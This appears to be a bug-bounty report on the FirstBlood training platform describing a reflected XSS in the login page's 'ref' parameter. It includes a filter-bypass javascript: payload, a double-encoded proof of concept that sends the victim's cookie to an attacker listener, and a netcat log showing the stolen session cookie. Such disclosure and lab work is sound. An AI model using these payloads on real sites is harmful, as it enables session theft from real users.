FirstBlood-#131 — Reflective XSS at http://firstbloodhackers.com:49421/login.php can be used to steal cookie
This issue was discovered on FirstBlood v1
On 2021-05-10, 0xconft Level 5 reported:
Hi there,
I found Reflective XSS on http://firstbloodhackers.com:49421/login.php at ref parameter and since firstbloodhackers.com doesn't have httponly flag at cookie header this xss can be used to steal cookie. I notice there's filter/sanitazion in ref parameter that will encode/replace certain character/word (e.g < > ( alert java javascript) but still it's vulnerable by XSS but it's require user interaction to click the "return to previous page" for XSS to be executed
PoC alert. You must click "return to previous page" for XSS to be executed
http://firstbloodhackers.com:49421/login.php?ref=ja%0dvascript:prompt%2528%271%27)
PoC Steal cookie
When doctor accessing this url while logged in at firstbloodhackers.com and click "return to previous page" the XSS will be executed and the cookie will be sent to attacker's server
http://firstbloodhackers.com:49421/login.php?ref=ja%0Dvascript:eval%2528%27%2576%2561%2572%2520%2578%2568%2572%2520%253d%2520%256e%2565%2577%2520%2558%254d%254c%2548%2574%2574%2570%2552%2565%2571%2575%2565%2573%2574%2528%2529%253b%2578%2568%2572%252e%256f%2570%2565%256e%2528%2522%2547%2545%2554%2522%252c%2520%2522%2568%2574%2574%2570%253a%252f%252f%2531%2539%2532%252e%2531%2536%2538%252e%2530%252e%2532%2530%253a%2531%2533%2533%2537%252f%253f%2575%253d%2522%252b%2564%256f%2563%2575%256d%2565%256e%2574%252e%2563%256f%256f%256b%2569%2565%2529%253b%2578%2568%2572%252e%2573%2565%256e%2564%2528%2529%253b%27)
The cookie will be sent to attacker's server
$ nc -lvnp 1337
Listening on 0.0.0.0 1337
Connection received on 192.168.0.20 50888
GET /?u=drps=c172050ce590be85ef316d017 HTTP/1.1
Host: 192.168.0.20:1337
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Origin: http://firstbloodhackers.com:49421
Connection: close
Referer: http://firstbloodhackers.com:49421/
Best Regards,
0xconft
P3 Medium
Endpoint: /login.php
Parameter: ref
Payload: ja%0Dvascript:eval%2528%27%2576%2561%2572%2520%2578%2568%2572%2520%253d%2520%256e%2565%2577%2520%2558%254d%254c%2548%2574%2574%2570%2552%2565%2571%2575%2565%2573%2574%2528%2529%253b%2578%2568%2572%252e%256f%2570%2565%256e%2528%2522%2547%2545%2554%2522%252c%2520%2522%2568%2574%2574%2570%253a%252f%252f%2531%2539%2532%252e%2531%2536%2538%252e%2530%252e%2532%2530%253a%2531%2533%2533%2537%252f%253f%2575%253d%2522%252b%2564%256f%2563%2575%256d%2565%256e%2574%252e%2563%256f%256f%256b%2569%2565%2529%253b%2578%2568%2572%252e%2573%2565%256e%2564%2528%2529%253b%27)
FirstBlood ID: 3
Vulnerability Type: Reflective XSS
The parameter "ref" is vulnerable to XSS on login.php. The developer has tried to prevent a malicious actor from redirecting to a javascript URI but the attempt to stop this was poor and thus it can be bypassed.
Creator & Administrator
Great finding, even though this is a dupe, i'm awarding a bounty at my discretion